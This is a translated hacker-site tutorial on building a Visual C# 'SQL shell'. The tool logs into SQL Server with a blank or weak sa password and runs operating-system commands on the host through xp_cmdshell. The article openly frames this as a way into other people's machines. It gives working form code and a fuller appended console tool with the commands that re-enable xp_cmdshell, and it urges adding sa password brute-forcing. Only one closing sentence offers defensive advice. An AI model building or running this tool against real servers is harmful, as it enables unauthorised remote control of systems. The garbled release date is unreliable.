Use Visual C# to easily create an SQL shell


(Author: mikespook | Release date: 354-10-7)

Keywords: C#, database, extended stored procedure, vulnerability
This article was contributed to Hacker Security Base. The article is owned by Hacker Security Base and may not be reproduced without its consent. Thank you for your cooperation!

Do you want to break into a system? Do you want system administrator privileges? Do you want to operate somebody else's computer remotely? How would you go about it? Brute-force the administrator password with a scanner? A remote overflow? If you feel these techniques are not well suited to attacking the operating system itself, why not try another angle? When the door is locked, there is still the window. Sometimes we do not need to fixate on the operating system password, because the password of another service the system provides may be much easier to obtain.
When running your scanners, have you come across a system that exposes SQL Server? Did the scanner report that the SQL Server sa password is empty or weak? If so, have you ever used that weakness to get into the host? Let's look at what can be done with sa privileges on a SQL Server.
With sa privileges on SQL Server we can run the extended stored procedure xp_cmdshell, which executes an operating system command on the server and returns its output as a result set. Log on as sa with Query Analyzer and any command can be passed through xp_cmdshell to achieve what we want. Note that the command runs in the security context of the SQL Server service account, so whatever rights that account has (often LocalSystem on older installations) are the rights we get.
For example, suppose we have obtained the sa password "123456" for a SQL Server machine named "M-s". Start SQL Query Analyzer (a tool shipped with the SQL Server client), enter the computer name, user name and password, and log on to the SQL Server, as shown in Figure 1:
Figure 1
Now let's look at the contents of the root directory of the C: drive on this machine. Enter xp_cmdshell 'dir C:\' in Query Analyzer; the result is shown in Figure 2:
Figure 2
See that? The result of this statement is the listing of the root directory of the C: drive on that computer. What else would you like to do there? Just change the command that is executed: tftp, net, ... Aren't these exactly the commands you dream of running on the machine you want to get into? And we never scanned for the operating system administrator password, because getting in through SQL Server does not require operating system administrator privileges at all.
However, using SQL Query Analyzer is inconvenient: to get it you have to install the SQL Server client tools, and the installation steps and caveats alone would give me enough material to squeeze a good deal of article fee out of the editor. Now that we understand the principle, why not write a tool of our own?
Next we will use the System.Data.SqlClient namespace of .NET, whose classes are dedicated to connecting to SQL Server, to write an SQL shell in Visual C#.
Feeling a bit dizzy at the idea of writing an SQL shell in Visual C#? You have to connect to the SQL database and then execute an extended stored procedure. Don't worry: the .NET class library does so much for us that we need to write fewer than 40 lines of code by hand. Let's go through the specific steps.
Of course, following my habit, we first build the interface we need (Figure 3):
Figure 3
Create a new Windows Application project in Visual C# and name it sqlcmd. In the description below, the content in parentheses is the control properties that need to be changed; properties not mentioned keep their default values.
Add a group box (Name: groupbox1, Text: SQL Server) to the form (Name: frmmain, Text: SQL shell). Inside the group box add three labels (Name: label1, Text: SQL Server; Name: label2, Text: User Name; Name: label3, Text: Password), three text boxes (Name: txtserver; Name: txtid, Text: sa; Name: txtpassword, PasswordChar: *) and a check box (Name: cbnullpassword, Text: Empty Password). To the form frmmain add a list box (Name: lbresult, HorizontalScrollbar: True, TabStop: False), a label (Name: label4, Text: Command), a combo box (Name: cbcmd) and a button (Name: btncmd, Text: Execute). Finally add a status bar (Name: statusbar1) with two panels (Name: Systolic, Text: Status, Width: 40; Name: sbpmsg). You can adjust the Anchor property of the controls to make the layout tidy.
Also add two non-visual data controls, found under the "Data" tab of the toolbox: a SqlConnection (Name: sqlconn) and a SqlCommand (Name: sqlcomm, Connection: sqlconn).
The interface is ready; what remains is the code.
Add the following code to the CheckedChanged event of the check box cbnullpassword:
private void cbnullpassword_CheckedChanged(object sender, System.EventArgs e)
{
    // Disable the password box while "Empty Password" is checked
    txtpassword.Enabled = !cbnullpassword.Checked;
}
This disables the password box when "Empty Password" is checked. Some readers may ask: isn't this redundant? If sa has a blank password, can't we just leave the password box empty? Certainly, but it is not ideal. I will explain later why this check box is there.
Add the following code to the KeyPress event of the combo box cbcmd:
private void cbcmd_KeyPress(object sender, System.Windows.Forms.KeyPressEventArgs e)
{
    // The Enter key arrives in KeyPress as '\r' (carriage return), not '\n'
    if ('\r' == e.KeyChar)
        btncmd_Click(sender, e);
}
When the combo box has the focus and Enter is pressed, this is equivalent to clicking the btncmd button.
Now for the core part. For convenience I have put a line number in front of each line of code; the numbers are not part of the code. The form's source file needs using System.Data; and using System.Data.SqlClient; at the top.
10  private void btncmd_Click(object sender, System.EventArgs e)
20  {
30      try
40      {
50          sbpmsg.Text = "Command '" + cbcmd.Text + "' is executing...";
60          this.Cursor = Cursors.WaitCursor;
70          string pw = "";
80          if (!cbnullpassword.Checked)
90              pw = "Password=" + txtpassword.Text + ";";
100         sqlconn.ConnectionString = "Data Source=" + txtserver.Text + ";Initial Catalog=master;" + pw + "Persist Security Info=" + (!cbnullpassword.Checked).ToString() + ";User ID=" + txtid.Text + ";Packet Size=4096"; // Data Source is the server to connect to
110         sqlcomm.CommandText = "xp_cmdshell 'cmd /c " + cbcmd.Text + "'";
120         sqlcomm.Connection.Open();
130         lbresult.Items.Add("【★★★★★\"" + cbcmd.Text + "\"★★★★★】");
140         SqlDataReader reader = sqlcomm.ExecuteReader();
150         while (reader.Read())
160         {
170             if (!reader.IsDBNull(0)) // xp_cmdshell ends its output with a NULL row
180                 lbresult.Items.Add(reader.GetString(0));
190         }
200         sbpmsg.Text = "Command '" + cbcmd.Text + "' executed successfully!";
210         sqlcomm.Connection.Close();
220         lbresult.Items.Add("【★★★★★\"" + cbcmd.Text + "\"★★★★★】");
230         lbresult.Items.Add("");
240         if (!cbcmd.Items.Contains(cbcmd.Text))
250             cbcmd.Items.Insert(0, cbcmd.Text);
260         cbcmd.Text = "";
270         lbresult.SelectedIndex = lbresult.Items.Count - 1;
280         this.Cursor = Cursors.Default;
290     }
300     catch (Exception ex)
310     {
320         this.Cursor = Cursors.Default;
325         if (sqlcomm.Connection.State != ConnectionState.Closed) sqlcomm.Connection.Close(); // do not leak the connection on failure
330         sbpmsg.Text = ex.Message;
340     }
350 }
Now let me explain the code above.
Line 50 shows in the status bar which command is currently running. If an exception is thrown anywhere during execution, it is caught at line 300, and line 330 displays the reason for the exception in the status bar.
Since some commands may take a long time, line 60 changes the mouse cursor to the wait cursor. When the command completes normally, line 280 restores it. If an exception occurs and execution never reaches line 280, the cursor is restored in the exception handler instead, at line 320.
Line 80 checks whether sa is logging in with an empty or a non-empty password; for an empty one the Password key is left out of the connection string entirely. This is also where the check box earns its keep: it lets us omit the key cleanly and set Persist Security Info to false at the same time. Be precise about what that key does, though: Persist Security Info only controls whether the password stays readable in ConnectionString after Open(); it does not skip password verification, SQL Server always authenticates the login, and a missing Password key is simply treated as an empty password. Setting it to false is the safer choice in every case.
Line 110 builds the extended stored procedure call. Note that I use the form xp_cmdshell 'cmd /c [command]' to execute commands. You could also use xp_cmdshell '[command]' directly, but the output is tidier with cmd /c. Also note that the command text is spliced straight into the statement, so a command containing a single quote will break it.
Lines 130, 220 and 230 are purely delimiters to make the output look nicer.
Line 140 declares a SqlDataReader instance to hold the command's output. Lines 150 to 190 read the result rows through the reader and add them to the list box. Line 170 deserves attention: you must check whether the value read is NULL (xp_cmdshell ends its result set with a NULL row) and only add non-NULL values to the list box; otherwise GetString throws an exception on the NULL value.
Line 240 checks whether the current command is already in the combo box's item list; if not, line 250 inserts it at the top. Line 260 then clears the combo box text.
Line 270 scrolls the list box to show the latest command output.
That's it: a simple SQL shell. How does it look? (Figure 4)
Figure 4
Following my old habit, here are a few tips on functionality I have left out.
1. When you run this program, command execution is slow. This is because every command reconnects to the database, runs the extended stored procedure, then disconnects. You can connect once before executing commands and afterwards only execute the stored procedure.
2. Because command execution is slow, the program stops responding while the while loop at line 150 runs. Multithreading avoids this (see my earlier article on a multithreaded scanner in Visual C#).
3. Refer to that article on building a multithreaded scanner in Visual C# and add dictionary-based brute forcing of the sa password to make this SQL shell a really useful tool.
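As an added example, not the article's own code, here is the same shell written as a console program on the System.Data.SqlClient namespace the article uses. It assumes a reachable SQL Server 2005 or later (the sys.configurations check does not exist on SQL Server 2000), a login with sysadmin rights, and .NET Framework with System.Data available; the server name, user and password are taken from the command line. It also shows what the form version leaves out: the connection is opened once and reused for every command (tip 1), the connection string is built with SqlConnectionStringBuilder so a password containing ';' or '=' cannot corrupt the other keys, and the command is passed to xp_cmdshell as a parameter so a single quote in it does not break the statement. Before the prompt appears it checks whether xp_cmdshell is enabled at all, since on SQL Server 2005 and later it is off by default.

```csharp
// Added example: console SQL shell over xp_cmdshell (not the article's form code).
// Assumes System.Data.SqlClient, SQL Server 2005+ and a sysadmin login.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

class SqlCmdShell
{
    static void Main(string[] args)
    {
        if (args.Length < 2)
        {
            Console.WriteLine("usage: sqlcmdshell <server> <user> [password]");
            return;
        }

        // A builder instead of string concatenation: the password is quoted for us,
        // and Persist Security Info=false keeps it out of ConnectionString after Open().
        var csb = new SqlConnectionStringBuilder
        {
            DataSource = args[0],
            InitialCatalog = "master",
            UserID = args[1],
            Password = args.Length > 2 ? args[2] : "",   // blank sa password: send an empty string
            PersistSecurityInfo = false,
            PacketSize = 4096
        };

        using (var conn = new SqlConnection(csb.ConnectionString))
        {
            conn.Open();   // connect once; every command below reuses this connection

            if (!IsXpCmdShellEnabled(conn))
            {
                // Off by default since SQL Server 2005. A sysadmin can turn it on with:
                //   EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
                //   EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
                Console.WriteLine("xp_cmdshell is disabled on this server (sys.configurations).");
                return;
            }

            string line;
            Console.Write("sql> ");
            while ((line = Console.ReadLine()) != null && line != "exit")
            {
                foreach (string row in RunCommand(conn, line))
                    Console.WriteLine(row);
                Console.Write("sql> ");
            }
        }
    }

    // value_in_use = 1 means the option is enabled on the running instance.
    static bool IsXpCmdShellEnabled(SqlConnection conn)
    {
        using (var cmd = new SqlCommand(
            "SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = 'xp_cmdshell'", conn))
        {
            object v = cmd.ExecuteScalar();
            return v != null && (int)v == 1;
        }
    }

    // Runs one OS command through xp_cmdshell and returns its output lines.
    // The command goes in as a parameter, so quotes in it reach cmd.exe verbatim
    // instead of terminating the T-SQL string as they would in the form version.
    static List<string> RunCommand(SqlConnection conn, string osCommand)
    {
        var output = new List<string>();
        using (var cmd = new SqlCommand("EXEC master..xp_cmdshell @cmd", conn))
        {
            cmd.Parameters.Add("@cmd", SqlDbType.NVarChar, 4000).Value = "cmd /c " + osCommand;
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    // xp_cmdshell ends its result set with a NULL row; GetString would throw on it.
                    if (!reader.IsDBNull(0))
                        output.Add(reader.GetString(0));
                }
            }
        }
        return output;
    }
}
```

Run it as sqlcmdshell M-s sa 123456 with the host and password from the article's example; commands are typed at the sql> prompt and exit ends the session. The defensive reading is the mirror image of the tool: because xp_cmdshell runs with the rights of the SQL Server service account, keep the option disabled, never leave sa with a blank or weak password, and run the service under a low-privilege account rather than LocalSystem.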
